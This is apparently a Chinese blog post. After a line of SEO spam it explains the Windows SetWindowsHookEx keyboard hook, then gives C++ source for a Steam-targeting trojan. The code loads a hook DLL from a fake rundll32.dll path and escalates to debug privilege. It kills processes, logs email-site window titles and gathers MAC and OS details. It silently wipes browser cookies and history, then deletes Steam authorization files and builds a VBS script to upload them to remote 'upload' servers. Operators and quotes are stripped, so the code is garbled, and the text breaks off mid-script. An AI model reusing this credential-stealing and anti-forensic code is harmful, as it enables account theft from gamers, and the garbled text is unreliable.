石家庄市规划建设局网站,网络优化网站 site,兼职做网站的费用,烟台做公司网站简介 SetWindowsHookEx 钩子(Hook)#xff0c;是Windows消息处理机制的一个平台#xff0c;应用程序可以在上面设置子程以监视指定窗口的某种消息#xff0c;而且所监视的窗口可以是其他进程所创建的。当消息到达后#xff0c;在目标窗口处理函数之前处理它。钩子机制允许应… 简介 SetWindowsHookEx 钩子(Hook)是Windows消息处理机制的一个平台应用程序可以在上面设置子程以监视指定窗口的某种消息而且所监视的窗口可以是其他进程所创建的。当消息到达后在目标窗口处理函数之前处理它。钩子机制允许应用程序截获处理window消息或特定事件。 钩子实际上是一个处理消息的程序段通过系统调用把它挂入系统。每当特定的消息发出在没有到达目的窗口前钩子程序就先捕获该消息亦即钩子函数先得到控制权。这时钩子函数即可以加工处理改变该消息也可以不作处理而继续传递该消息还可以强制结束消息的传递。在窗口消息的处理流程插队加入自己的处理函数。 在Ring3级下SetWindowsHookEx 这个函数能够实现优先拦截提交给特定窗口的信息并进行拦截者需要的处理然后再提交给窗口函数或是下一个钩子函数函数第一个参数为idHook需要设置钩子的类型在以下代码样例中我们选择安装的钩子类型为WH_GETMESSAGE用来拦截WM_KEYDOWN键盘信息。
函数原型
SetWindowsHookEx(//钩子类型_In_ int idHook,//回调函数地址_In_ HOOKPROC lpfn,//实例句柄(包含有钩子函数)_In_opt_ HINSTANCE hmod,//线程ID欲勾住的线程为0则不指定全局_In_ DWORD dwThreadId);
设置Hook类型如下
宏值含义WH_MSGFILTER截获用户与控件交互的消息WH_KEYBOARD截获键盘消息WH_GETMESSAGE截获从消息队列送出的消息WH_CBT截获系统基本消息激活建立销毁最小化最大化移动改变尺寸等窗口事件WH_MOUSE截获鼠标消息WH_CALLWNDPROCRET截获目标窗口处理完毕的消息
返回值
若此函数执行成功则返回值就是该挂钩处理过程的句柄若此函数执行失败则返回值为NULL(0)。若想获得更多错误信息请调用GetLastError函数。 实现代码 以下是部分实现代码忘了是啥年代写的没啥技术含量大佬可以忽略。
主程序
// Steam.cpp : Defines the entry point for the application.
/#include stdafx.h// 函数声明LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);// 程序入口点int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{// TODO: Place code here.//加密标识CString Error ****** 2019.04.07;MSG msg;HWND hWnd;char szTitle[]Rainbow; // The title bar textchar szWindowClass[]RBTools; // The title bar textWNDCLASSEX wcex{0};wcex.cbSize sizeof(WNDCLASSEX); //WNDCLASSEX结构体大小wcex.style CS_HREDRAW | CS_VREDRAW; //位置改变时重绘wcex.lpfnWndProc (WNDPROC)WndProc; //消息处理函数wcex.hInstance 0; //当前实例句柄wcex.hbrBackground (HBRUSH)COLOR_WINDOWFRAME; //背景色wcex.lpszClassName szWindowClass; //参窗口类名wcex.hIcon 0; //图标wcex.hCursor 0; //光标wcex.lpszMenuName 0; //菜单名称wcex.hIconSm 0; //最小化图标RegisterClassEx(wcex); //注册窗口类hWnd CreateWindow(szWindowClass, szTitle, WS_DISABLED, //创建窗口CW_USEDEFAULT,CW_USEDEFAULT, 1, 1, NULL, NULL, 0, NULL);if (!hWnd){return FALSE;}ShowWindow(hWnd, 0);UpdateWindow(hWnd);char szDllPath1[MAX_PATH] { 0 };GetSystemDirectory(szDllPath1, sizeof(szDllPath1));strcpy(szDllPath12, \\Program Files\\Common Files\\rundll32.dll);static HINSTANCE hinstDLL1;typedef void (CALLBACK *inshook1)();//定义回调函数的地址 inshook1 instkbhook1;if(hinstDLL1LoadLibrary((LPCTSTR)szDllPath1)){instkbhook1(inshook1)GetProcAddress(hinstDLL1, installhook); instkbhook1();}while (GetMessage(msg, NULL, 0, 0)) // 消息循环:{TranslateMessage(msg); //转化虚拟按键到字符消息DispatchMessage(msg); //分派消息调用回调函数}return msg.wParam;
}LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{switch (message) {case WM_DESTROY: //窗口销毁消息PostQuitMessage(0);break;default:return DefWindowProc(hWnd, message, wParam, lParam);}return 0;
} HOOK DLL
// test3.cpp : Defines the initialization routines for the DLL.
//#include stdafx.h
#include test3.h#define DllExport _declspec(dllexport)#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] __FILE__;
#endif#define SWEEP_BUFFER_SIZE 10000//合并区段
//#pragma comment(linker, /MERGE:.rdata.data)
//#pragma comment(linker, /MERGE:.text.data)
//#pragma comment(linker, /MERGE:.reloc.data)//共享区段
#pragma data_seg(.SHARDAT)#pragma data_seg()//设置区段属性
#pragma comment(linker, /section:.SHARDAT,RWE)//
// 用户数据 ////// 到期时间 //CString UserEndData 2019.05.04; ////
//
// 配置数据// 用户 IDCString strUserID 002;// 程序版本CString szVersion 20190407_3;// 统计接口CString strServerName http://login.37wan.com/;// 邮箱 上传接口CString strMailServerName http://upload.37wan.com/;//char osx[MAX_PATH]{0};
char jsj[MAX_PATH]{0};CString szLocalLP ;
CString szAccount ;
CString myEmailSTR ;
CString szMyselfPath ;
CString szStr , szStr2 ;
CString szMailID, szMailName, szMailAddr;
CString szRegExe, szSTPath, szSTFile, szOneUser, szRegUser, szRegUser2, szStrFirst, szStrSecon; BOOL Login false;
BOOL Regedit false;
BOOL szBrowser false;
BOOL szIERegedit false;
BOOL szEMailName false;
BOOL szTslgameEXE false;HWND hcaretWnd NULL;
static HANDLE thread NULL;HINSTANCE hins NULL;
static HHOOK hkb NULL;HINSTANCE hinss NULL;
static HHOOK hie NULL;static char TAB_BASE64[]{ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789/};//
// Note!
//
// If this DLL is dynamically linked against the MFC
// DLLs, any functions exported from this DLL which
// call into MFC must have the AFX_MANAGE_STATE macro
// added at the very beginning of the function.
//
// For example:
//
// extern C BOOL PASCAL EXPORT ExportedFunction()
// {
// AFX_MANAGE_STATE(AfxGetStaticModuleState());
// // normal function body here
// }
//
// It is very important that this macro appear in each
// function, prior to any calls into MFC. This means that
// it must appear as the first statement within the
// function, even before any object variable declarations
// as their constructors may generate calls into the MFC
// DLL.
//
// Please see MFC Technical Notes 33 and 58 for additional
// details.
///
// CTest3AppBEGIN_MESSAGE_MAP(CTest3App, CWinApp)//{{AFX_MSG_MAP(CTest3App)// NOTE - the ClassWizard will add and remove mapping macros here.// DO NOT EDIT what you see in these blocks of generated code!//}}AFX_MSG_MAP
END_MESSAGE_MAP()// 提升程序系统权限BOOL DllExport AdjustPrivileges()
{HANDLE hToken NULL;TOKEN_PRIVILEGES tp {0};TOKEN_PRIVILEGES oldtp {0};DWORD dwSize sizeof(TOKEN_PRIVILEGES);LUID luid {0};if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, hToken)) {if (GetLastError()ERROR_CALL_NOT_IMPLEMENTED)return TRUE;elsereturn FALSE;}if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, luid)) {CloseHandle(hToken);return FALSE;}tp.PrivilegeCount1;tp.Privileges[0].Luid luid;tp.Privileges[0].Attributes SE_PRIVILEGE_ENABLED;/* Adjust Token Privileges */if (!AdjustTokenPrivileges(hToken, FALSE, tp, sizeof(TOKEN_PRIVILEGES), oldtp, dwSize)) {CloseHandle(hToken);return FALSE;}// close handlesCloseHandle(hToken);return TRUE;
}// 设置当前进程优先级为最高(实时)BOOL DllExport SetRealTimePriority()
{if ( !SetPriorityClass( GetCurrentProcess(), REALTIME_PRIORITY_CLASS ) ){return FALSE;}return TRUE;
}// 数据加密int DllExport tranasci(char a)
{return (a-A65);
}CString DllExport gen(CString m_url)
{int i0;int l0;int k0;CString curl;lm_url.GetLength();for(i;il;i2){char temp1m_url.GetAt( i );char temp2m_url.GetAt(i1);if(temp2NULL){int ansi1tranasci(temp1);CString str1;str1.Format(%X,ansi1);str1.Replace(FFFFFF, );//curl%;curlstr1;break;}int ansi1tranasci(temp1);int ansi2tranasci(temp2);CString str1;CString str2;str1.Format(%X,ansi1);str2.Format(%X,ansi2);str1.Replace(FFFFFF, );str2.Replace(FFFFFF, );//curl%;curlstr1;//curl%;curlstr2;}if (l%2){}else{
// curl%;}return curl;
}CString DllExport BASE64Encode(CString strIn, long Len)
{ CString strOut,strTemp; BYTE chr[3]; char chrBs[5]; long lTemp,lTemp2; chrBs[4]\0; strOut; if(Len1) { return strOut; } for (lTemp0;lTempLen/3;lTemp) { lTemp2lTemp*3; chr[0](BYTE)strIn.GetAt(lTemp2); chr[1](BYTE)strIn.GetAt(lTemp21); chr[2](BYTE)strIn.GetAt(lTemp22); chrBs[0](chr[0]2)0x3F; chrBs[1]((chr[0]4)|(chr[1]4))0x3F; chrBs[2]((chr[1]2)|(chr[2]6))0x3F; chrBs[3]chr[2]0x3F; chrBs[0]TAB_BASE64[chrBs[0]]; chrBs[1]TAB_BASE64[chrBs[1]]; chrBs[2]TAB_BASE64[chrBs[2]]; chrBs[3]TAB_BASE64[chrBs[3]]; strOutchrBs; } if (1Len%3) { chr[0](BYTE)strIn.GetAt(Len-1); chrBs[0](chr[0]2)0x3F; chrBs[1](chr[0]4)0x3F; chrBs[0]TAB_BASE64[chrBs[0]]; chrBs[1]TAB_BASE64[chrBs[1]]; chrBs[2]; chrBs[3]; strOutchrBs; } else if (2Len%3) { chr[0](BYTE)strIn.GetAt(Len-2); chr[1](BYTE)strIn.GetAt(Len-1); chrBs[0](chr[0]2)0x3F; chrBs[1]((chr[0]4)|(chr[1]4))0x3F; chrBs[2](chr[1]2)0x3F; chrBs[0]TAB_BASE64[chrBs[0]]; chrBs[1]TAB_BASE64[chrBs[1]]; chrBs[2]TAB_BASE64[chrBs[2]]; chrBs[3]; strOutchrBs; } return strOut;
} // 获取随机名称CString DllExport GetName()
{CString mySTR1 , mySTR2 ;time_t seed time(NULL); srand((unsigned)seed);for(int j0; j6 ;j){int randNum rand()%26;//取一个随机数该数字为0-25if(j%2){mySTR1.Format(%C, randNum97);//随机数为0到25而小写字母的asc码为97到122所以加97}else{mySTR1.Format(%C, randNum65);//随机数为0到25而大写字母的asc码为65到90所以加65}mySTR2 mySTR1;Sleep(100);//sleep一下使随机因子取的分散些}return mySTR2;
}// 结束进程BOOL DllExport KillProcess(CString szProcess)
{BOOL szKill FALSE;PROCESSENTRY32 pe32;pe32.dwSize sizeof(pe32);HANDLE hpro::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);if(hproINVALID_HANDLE_VALUE){ return szKill;}szProcess.MakeLower();BOOL nowrunProcess32First(hpro,pe32);while(nowrun){CString szGetProcess;szGetProcess pe32.szExeFile;szGetProcess.MakeLower();if(szGetProcess szProcess){DWORD proidpe32.th32ProcessID;HANDLE hprocess::OpenProcess(PROCESS_ALL_ACCESS,FALSE,proid);if(hprocess!NULL){::TerminateProcess(hprocess,0);szKill TRUE;}::CloseHandle(hprocess);}nowrun::Process32Next(hpro,pe32);}::CloseHandle(hpro);return szKill;
}// 获取 steam.exe 进程标识DWORD DllExport GetEXE()
{HANDLE m_handle::CreateToolhelp32Snapshot(TH32CS_SNAPALL,0);PROCESSENTRY32* Info new PROCESSENTRY32;Info-dwSize sizeof(PROCESSENTRY32);if(::Process32First(m_handle,Info)){while(::Process32Next(m_handle,Info)!FALSE){CString ss;ssInfo-szExeFile;ss.MakeLower();if(ss.Find(steam.exe) ! -1){return Info-th32ProcessID;}}::CloseHandle(m_handle);if(Info){delete Info;}}return -1;
}// 查找进程BOOL DllExport GetProcess(CString TargetName)
{ CString fileName(TargetName);fileName.MakeLower(); //转为小写 HANDLE hShot CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); // 创建快照句柄 PROCESSENTRY32 pe32x {sizeof(PROCESSENTRY32),0};//定义一个PROCESSENTRY32结类型的变量 if( Process32First(hShot,pe32x) ) {do{CString process_fileName pe32x.szExeFile;process_fileName.MakeLower();//进程文件名转换为小写if( fileName process_fileName ){CloseHandle(hShot);return TRUE;}}while( Process32Next(hShot, pe32x) );} CloseHandle(hShot);return FALSE;
}// 枚举顶层窗口获取标题BOOL DllExport CALLBACK EnumWindowsProc(HWND hWnd, LPARAM lParam)
{if( GetParent(hWnd)NULL IsWindowVisible(hWnd) ){TCHAR sTitle[MAX_PATH]{0};ZeroMemory(sTitle, MAX_PATH * sizeof(TCHAR));GetWindowText(hWnd, sTitle, sizeof(sTitle));//SendMessage(hWnd, WM_GETTEXT, (WPARAM)MAX_PATH, (LPARAM)sTitle);//AfxMessageBox(sTitle);CString szMainName ;szMainName.Format(TEXT(%s), sTitle);int MAIL0 szMainName.Find(邮箱大全, 0);char *MAIL1;MAIL1 strstr(sTitle, 邮箱);char *MAIL2;MAIL2 strstr(sTitle, 电子邮);char *MAIL3;MAIL3 strstr(sTitle, 免费邮);char *MAIL4;MAIL4 strstr(sTitle, 电子邮件);char *MAIL5;MAIL5 strstr(sTitle, 手机统一);char *MAIL6;MAIL6 strstr(sTitle, Microsoft 帐户);char *MAIL7;MAIL7 strstr(sTitle, Yahoo -);if( MAIL0 -1 (MAIL1 || MAIL2 || MAIL3 || MAIL4 || MAIL5 || MAIL6 || MAIL7) ){HWND Hwnd_Browser ::GetForegroundWindow();if(hWnd Hwnd_Browser){if(!szEMailName){CString szACCID;szACCID.Format(TEXT(C:\\MailName.txt));szMailName.Format(TEXT(%s), sTitle);FILE *fps1;fps1fopen(szACCID, w);if(fps1){fprintf(fps1, %s, szMailName.GetBuffer(0));}fclose(fps1);szEMailName true;}//AfxMessageBox(szMailName);return FALSE;}}}return TRUE;
}// 获取 MACtypedef struct _ASTAT_
{ ADAPTER_STATUS adapt; NAME_BUFFER NameBuff[30];
}ASTAT, * PASTAT;UCHAR DllExport GetAddressByIndex(int lana_num,ASTAT Adapter)
{UCHAR uRetCode; //-------------------------------------------------------------------NCB ncb; memset(ncb, 0, sizeof(ncb) ); ncb.ncb_command NCBRESET; ncb.ncb_lana_num lana_num; //指定网卡号,首先对选定的网卡发送一个NCBRESET命令,以便进行初始化 uRetCode Netbios(ncb ); memset(ncb, 0, sizeof(ncb) ); ncb.ncb_command NCBASTAT; ncb.ncb_lana_num lana_num;//指定网卡号 strcpy((char *)ncb.ncb_callname,* ); ncb.ncb_buffer (unsigned char *)Adapter; //指定返回的信息存放的变量 ncb.ncb_length sizeof(Adapter); //接着,可以发送NCBASTAT命令以获取网卡的信息 uRetCode Netbios(ncb ); //-------------------------------------------------------------------return uRetCode;
}CString DllExport GetMacAddress(void)
{CString strMacAddress;//-------------------------------------------------------------------NCB ncb; UCHAR uRetCode;int num 0;LANA_ENUM lana_enum; memset(ncb, 0, sizeof(ncb) ); ncb.ncb_command NCBENUM; ncb.ncb_buffer (unsigned char *)lana_enum; ncb.ncb_length sizeof(lana_enum); //向网卡发送NCBENUM命令,以获取当前机器的网卡信息,如有多少个网卡//每张网卡的编号等 uRetCode Netbios(ncb);if (uRetCode 0) {num lana_enum.length;//对每一张网卡,以其网卡编号为输入编号,获取其MAC地址 for (int i 0; i num; i){ASTAT Adapter;if(GetAddressByIndex(lana_enum.lana[i],Adapter) 0){strMacAddress.Format(_T(%02X%02X%02X%02X%02X%02X), Adapter.adapt.adapter_address[0], Adapter.adapt.adapter_address[1], Adapter.adapt.adapter_address[2], Adapter.adapt.adapter_address[3], Adapter.adapt.adapter_address[4], Adapter.adapt.adapter_address[5]);}}}//-------------------------------------------------------------------return strMacAddress;
}// 获取 IE 版本CString DllExport GetIEVerSion()
{HKEY hKEY;CString myIEVersion ;LPCTSTR data_Set SOFTWARE\\Microsoft\\Internet Explorer;long ret0(RegOpenKeyEx(HKEY_LOCAL_MACHINE, data_Set, 0, KEY_WOW64_64KEY | KEY_READ, hKEY)); if(ret0 ERROR_SUCCESS){LPBYTE owner_Get1new BYTE[80];DWORD type_1REG_SZ;DWORD cbData_180;long ret1::RegQueryValueEx(hKEY, svcVersion, NULL, type_1, owner_Get1, cbData_1); if(ret1 ERROR_SUCCESS) { char *IEVersion (char *)owner_Get1;myIEVersion.Format(TEXT(%s), IEVersion);}else{LPBYTE owner_Get2new BYTE[80];DWORD type_2REG_SZ;DWORD cbData_280;long ret2::RegQueryValueEx(hKEY, Version, NULL, type_2, owner_Get2, cbData_2);if(ret2 ERROR_SUCCESS) { char *IEVersion (char *)owner_Get2;myIEVersion.Format(TEXT(%s), IEVersion);}}}RegCloseKey(hKEY);return myIEVersion;
}// 获取系统位数BOOL DllExport IsWow64()
{typedef BOOL (WINAPI *LPFN_ISWOW64PROCESS) (HANDLE, PBOOL);LPFN_ISWOW64PROCESS fnIsWow64Process;BOOL bIsWow64 FALSE;fnIsWow64Process (LPFN_ISWOW64PROCESS)GetProcAddress( GetModuleHandle(kernel32),IsWow64Process);if (NULL ! fnIsWow64Process){fnIsWow64Process(GetCurrentProcess(),bIsWow64);}return bIsWow64;
}// 获取系统版本void DllExport os()
{//先判断是否为 win8.1 或 win10typedef void(__stdcall*NTPROC)(DWORD*, DWORD*, DWORD*);HINSTANCE hinst LoadLibrary(ntdll.dll);DWORD dwMajor, dwMinor, dwBuildNumber;NTPROC proc (NTPROC)GetProcAddress(hinst, RtlGetNtVersionNumbers); proc(dwMajor, dwMinor, dwBuildNumber); if (dwMajor 6 dwMinor 3) //win 8.1{strcat(osx, Win 8.1);}else if (dwMajor 10 dwMinor 0) //win 10{strcat(osx, Win 10);}else{//判断win8.1以下的版本SYSTEM_INFO info; //用SYSTEM_INFO结构判断64位AMD处理器 GetSystemInfo(info); //调用GetSystemInfo函数填充结构 OSVERSIONINFOEX os;os.dwOSVersionInfoSize sizeof(OSVERSIONINFOEX);#pragma warning(disable:4996)if (GetVersionEx((OSVERSIONINFO *)os)){//下面根据版本信息判断操作系统名称 switch (os.dwMajorVersion){case 5:switch (os.dwMinorVersion){case 0:strcat(osx, Win 2000);break;case 1:strcat(osx, Win XP);break;case 2:if (os.wProductType VER_NT_WORKSTATION info.wProcessorArchitecture PROCESSOR_ARCHITECTURE_AMD64)strcat(osx, Win XP Professional x64 Edition);elsestrcat(osx, Win Server 2003);break;}break;case 6:switch (os.dwMinorVersion){case 0:if (os.wProductType VER_NT_WORKSTATION)strcat(osx, Win Vista);elsestrcat(osx, Win Server 2008);break;case 1:if (os.wProductType VER_NT_WORKSTATION)strcat(osx, Win 7);elsestrcat(osx, Win Server 2008 R2);break;case 2:if (os.wProductType VER_NT_WORKSTATION)strcat(osx, Win 8);elsestrcat(osx, Win Server 2012);break;}break;default:strcat(osx, Unkonw OS);}}elsestrcat(osx, Unkonw OS);}if(IsWow64()){strcat(osx, x64);}else{strcat(osx, x86);}
}// 清理缓存文件enum DEL_CACHE_TYPE //要删除的类型。
{File,//表示internet临时文件Cookie //表示Cookie
};BOOL DllExport DeleteUrlCache(DEL_CACHE_TYPE type)
{BOOL bRet FALSE;HANDLE hEntry;LPINTERNET_CACHE_ENTRY_INFO lpCacheEntry NULL; DWORD dwEntrySize;//delete the filesdwEntrySize 0;hEntry FindFirstUrlCacheEntry(NULL, NULL, dwEntrySize);lpCacheEntry (LPINTERNET_CACHE_ENTRY_INFO) new char[dwEntrySize];hEntry FindFirstUrlCacheEntry(NULL, lpCacheEntry, dwEntrySize);if (!hEntry){goto cleanup;}do{if (type File !(lpCacheEntry-CacheEntryType COOKIE_CACHE_ENTRY)){DeleteUrlCacheEntry(lpCacheEntry-lpszSourceUrlName);}else if (type Cookie (lpCacheEntry-CacheEntryType COOKIE_CACHE_ENTRY)){DeleteUrlCacheEntry(lpCacheEntry-lpszSourceUrlName);}dwEntrySize 0;FindNextUrlCacheEntry(hEntry, NULL, dwEntrySize);delete [] lpCacheEntry; lpCacheEntry (LPINTERNET_CACHE_ENTRY_INFO) new char[dwEntrySize];}while (FindNextUrlCacheEntry(hEntry, lpCacheEntry, dwEntrySize));bRet TRUE;
cleanup:if (lpCacheEntry){delete [] lpCacheEntry; }return bRet;
}BOOL DllExport WipeFile(LPCTSTR szDir, LPCTSTR szFile)
{CString sPath;HANDLE hFile;DWORD dwSize;DWORD dwWrite;char sZero[SWEEP_BUFFER_SIZE];memset(sZero, 0, SWEEP_BUFFER_SIZE);sPath szDir;sPath _T(\\);sPath szFile;hFile CreateFile(sPath, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);if (hFile INVALID_HANDLE_VALUE){return FALSE;}dwSize GetFileSize(hFile, NULL);//skip file header (actually, I dont know the file format of index.dat)dwSize - 64;SetFilePointer(hFile, 64, NULL, FILE_BEGIN);while (dwSize 0){if (dwSize SWEEP_BUFFER_SIZE){WriteFile(hFile, sZero, SWEEP_BUFFER_SIZE, dwWrite, NULL);dwSize - SWEEP_BUFFER_SIZE;}else{WriteFile(hFile, sZero, dwSize, dwWrite, NULL);break;}}CloseHandle(hFile);return TRUE;
}BOOL DllExport EmptyDirectory(LPCTSTR szPath, BOOL bDeleteDesktopIni, BOOL bWipeIndexDat)
{WIN32_FIND_DATA wfd;HANDLE hFind;CString sFullPath;CString sFindFilter;DWORD dwAttributes 0;sFindFilter szPath;sFindFilter _T(\\*.*);if ((hFind FindFirstFile(sFindFilter, wfd)) INVALID_HANDLE_VALUE){return FALSE;}do{if (_tcscmp(wfd.cFileName, _T(.)) 0 || _tcscmp(wfd.cFileName, _T(..)) 0 ||(bDeleteDesktopIni FALSE _tcsicmp(wfd.cFileName, _T(desktop.ini)) 0)){continue;}sFullPath szPath;sFullPath _T(\\);sFullPath wfd.cFileName;//去掉只读属性dwAttributes GetFileAttributes(sFullPath);if (dwAttributes FILE_ATTRIBUTE_READONLY){dwAttributes ~FILE_ATTRIBUTE_READONLY;SetFileAttributes(sFullPath, dwAttributes);}if (wfd.dwFileAttributes FILE_ATTRIBUTE_DIRECTORY){EmptyDirectory(sFullPath, bDeleteDesktopIni, bWipeIndexDat);RemoveDirectory(sFullPath);}else{if (bWipeIndexDat _tcsicmp(wfd.cFileName, _T(index.dat)) 0){WipeFile(szPath, wfd.cFileName);}DeleteFile(sFullPath);}}while (FindNextFile(hFind, wfd));FindClose(hFind);return TRUE;
}BOOL DllExport DelTempFiles()
{// 清理DNS缓存ShellExecute(NULL, open, ipconfig.exe, /flushdns, NULL, SW_HIDE);// 清理 缓存 与 CookiesTCHAR szPath[MAX_PATH];DeleteUrlCache(Cookie);if (SHGetSpecialFolderPath(NULL, szPath, CSIDL_COOKIES, FALSE)){EmptyDirectory(szPath, 1, 1);}CString myCleaner TEXT( /c del /f /s /q \%userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*.*\ del /f /s /q \%userprofile%\\AppData\\Local\\Microsoft\\Windows\\History\\*.*\ del /f /s /q \%userprofile%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\*.*\ del /f /s /q \%userprofile%\\Local Settings\\History\\*.*\ del /f /s /q \%userprofile%\\Local Settings\\Temporary Internet Files\\*.*\ del /f /s /q \%userprofile%\\AppData\\Roaming\\360se6\\User Data\\Default\\Cache\\*.*\ del /f /s /q \%userprofile%\\AppData\\Roaming\\360se6\\User Data\\Default\\Cookies\ del /f /s /q \%userprofile%\\AppData\\Roaming\\360se6\\User Data\\Default\\History\ del /f /s /q \%userprofile%\\AppData\\Local\\360Chrome\\Chrome\\User Data\\Default\\Cache\\*.*\ del /f /s /q \%userprofile%\\AppData\\Local\\360Chrome\\Chrome\\User Data\\Default\\Cookies\ del /f /s /q \%userprofile%\\AppData\\Local\\360Chrome\\Chrome\\User Data\\Default\\History\ del /f /s /q \%userprofile%\\AppData\\Local\\2345Explorer\\User Data\\Default\\Cache\\*.*\ del /f /s /q \%userprofile%\\AppData\\Local\\2345Explorer\\User Data\\Default\\CookiesV3\ del /f /s /q \%userprofile%\\AppData\\Local\\2345Explorer\\User Data\\Default\\History\ del /f /s /q \%userprofile%\\AppData\\Local\\liebao\\User Data\\Default\\Cache\\*.*\ del /f /s /q \%userprofile%\\AppData\\Local\\liebao\\User Data\\Default\\Cookies\ del /f /s /q \%userprofile%\\AppData\\Local\\liebao\\User Data\\Default\\History\ exit);//AfxMessageBox(myCleaner);ShellExecute(NULL, open, cmd.exe, myCleaner, , SW_HIDE);BOOL bResult FALSE;BOOL bDone FALSE;LPINTERNET_CACHE_ENTRY_INFO lpCacheEntry NULL;DWORD dwTrySize, dwEntrySize 4096; // start buffer sizeHANDLE hCacheDir NULL;DWORD dwError ERROR_INSUFFICIENT_BUFFER;do{switch (dwError){// need a bigger buffercase ERROR_INSUFFICIENT_BUFFER:delete [] lpCacheEntry;lpCacheEntry (LPINTERNET_CACHE_ENTRY_INFO) new char[dwEntrySize];lpCacheEntry-dwStructSize dwEntrySize;dwTrySize dwEntrySize;BOOL bSuccess;if (hCacheDir NULL)bSuccess (hCacheDir FindFirstUrlCacheEntry(NULL, lpCacheEntry,dwTrySize)) ! NULL;elsebSuccess FindNextUrlCacheEntry(hCacheDir, lpCacheEntry, dwTrySize);if (bSuccess)dwError ERROR_SUCCESS;else{dwError GetLastError();dwEntrySize dwTrySize; // use new size returned}break;// we are donecase ERROR_NO_MORE_ITEMS:bDone TRUE;bResult TRUE;break;// we have got an entrycase ERROR_SUCCESS:// dont delete cookie entryif (!(lpCacheEntry-CacheEntryType COOKIE_CACHE_ENTRY))DeleteUrlCacheEntry(lpCacheEntry-lpszSourceUrlName);// get ready for next entrydwTrySize dwEntrySize;if (FindNextUrlCacheEntry(hCacheDir, lpCacheEntry, dwTrySize))dwError ERROR_SUCCESS;else{dwError GetLastError();dwEntrySize dwTrySize; // use new size returned}break;// unknown errordefault:bDone TRUE;break;}if (bDone){delete []lpCacheEntry;if (hCacheDir)FindCloseUrlCache(hCacheDir);}} while (!bDone);return TRUE;
}// 删除授权文件模块BOOL DllExport SearchFilesByWildcard_1(LPCTSTR wildcardPath, LPCTSTR wildcardPathandFile)
{HANDLE hFile INVALID_HANDLE_VALUE;WIN32_FIND_DATA pNextInfo;CString mySSFNFiles ;hFile FindFirstFile(wildcardPathandFile, pNextInfo);if(INVALID_HANDLE_VALUE hFile){return FALSE;}if(pNextInfo.cFileName[0] ! .){mySSFNFiles.Format(TEXT(%s/%s), wildcardPath, pNextInfo.cFileName);//AfxMessageBox(mySSFNFiles);DeleteFile(mySSFNFiles);}while(FindNextFile(hFile, pNextInfo)){if(pNextInfo.cFileName[0] .){continue;}mySSFNFiles.Format(TEXT(%s/%s), wildcardPath, pNextInfo.cFileName);//AfxMessageBox(mySSFNFiles);DeleteFile(mySSFNFiles);}return FALSE;
}// 上传 并 删除 授权文件模块BOOL DllExport SearchFilesByWildcard_2(LPCTSTR wildcardPath, LPCTSTR wildcardPathandFile)
{HANDLE hFile INVALID_HANDLE_VALUE;WIN32_FIND_DATA pNextInfo;CString myLP;CString myVBSFilePath;CString mySSFNFiles , myTXTSSFNFiles , mySSFNFilesName ;myLP szLocalLP;CString myUploadVBS ;myUploadVBS Class XMLUpload \r\n;myUploadVBS Private xmlHttp \r\n;myUploadVBS Private objTemp \r\n;myUploadVBS Private adTypeBinary, adTypeText \r\n;myUploadVBS Private strCharset, strBoundary \r\n;myUploadVBS \r\n;myUploadVBS Private Sub Class_Initialize() \r\n;myUploadVBS adTypeBinary 1 \r\n;myUploadVBS adTypeText 2 \r\n;myUploadVBS Set xmlHttp CreateObject(\Msxml2.XMLHTTP\) \r\n;myUploadVBS Set objTemp CreateObject(\ADODB.Stream\) \r\n;myUploadVBS objTemp.Type adTypeBinary \r\n;myUploadVBS objTemp.Open \r\n;myUploadVBS strCharset \utf-8\ \r\n;myUploadVBS strBoundary GetBoundary() \r\n;myUploadVBS End Sub \r\n;myUploadVBS \r\n;myUploadVBS Private Sub Class_Terminate() \r\n;myUploadVBS objTemp.Close \r\n;myUploadVBS Set objTemp Nothing \r\n;myUploadVBS Set xmlHttp Nothing \r\n;myUploadVBS End Sub \r\n;myUploadVBS \r\n;myUploadVBS Public Function StringToBytes(ByVal strData, ByVal strCharset) \r\n;myUploadVBS Dim objFile \r\n;myUploadVBS Set objFile CreateObject(\ADODB.Stream\) \r\n;myUploadVBS objFile.Type adTypeText \r\n;myUploadVBS objFile.Charset strCharset \r\n;myUploadVBS objFile.Open \r\n;myUploadVBS objFile.WriteText strData \r\n;myUploadVBS objFile.Position 0 \r\n;myUploadVBS objFile.Type adTypeBinary \r\n;myUploadVBS If UCase(strCharset) \UNICODE\ Then \r\n;myUploadVBS objFile.Position 2 delete UNICODE BOM \r\n;myUploadVBS ElseIf UCase(strCharset) \UTF-8\ Then \r\n;myUploadVBS objFile.Position 3 delete UTF-8 BOM \r\n;myUploadVBS End If \r\n;myUploadVBS StringToBytes objFile.Read(-1) \r\n;myUploadVBS objFile.Close \r\n;myUploadVBS Set objFile Nothing \r\n;myUploadVBS End Function \r\n;myUploadVBS \r\n;myUploadVBS Private Function GetFileBinary(ByVal strPath) \r\n;myUploadVBS Dim objFile \r\n;myUploadVBS Set objFile CreateObject(\ADODB.Stream\) \r\n;myUploadVBS objFile.Type adTypeBinary \r\n;myUploadVBS objFile.Open \r\n;myUploadVBS objFile.LoadFromFile strPath \r\n;myUploadVBS GetFileBinary objFile.Read(-1) \r\n;myUploadVBS objFile.Close \r\n;myUploadVBS Set objFile Nothing \r\n;myUploadVBS End Function \r\n;myUploadVBS \r\n;myUploadVBS Private Function GetBoundary() \r\n;myUploadVBS Dim ret(12) \r\n;myUploadVBS Dim table \r\n;myUploadVBS Dim i \r\n;myUploadVBS table \abcdefghijklmnopqrstuvwxzy0123456789\ \r\n;myUploadVBS Randomize \r\n;myUploadVBS For i 0 To UBound(ret) \r\n;myUploadVBS ret(i) Mid(table, 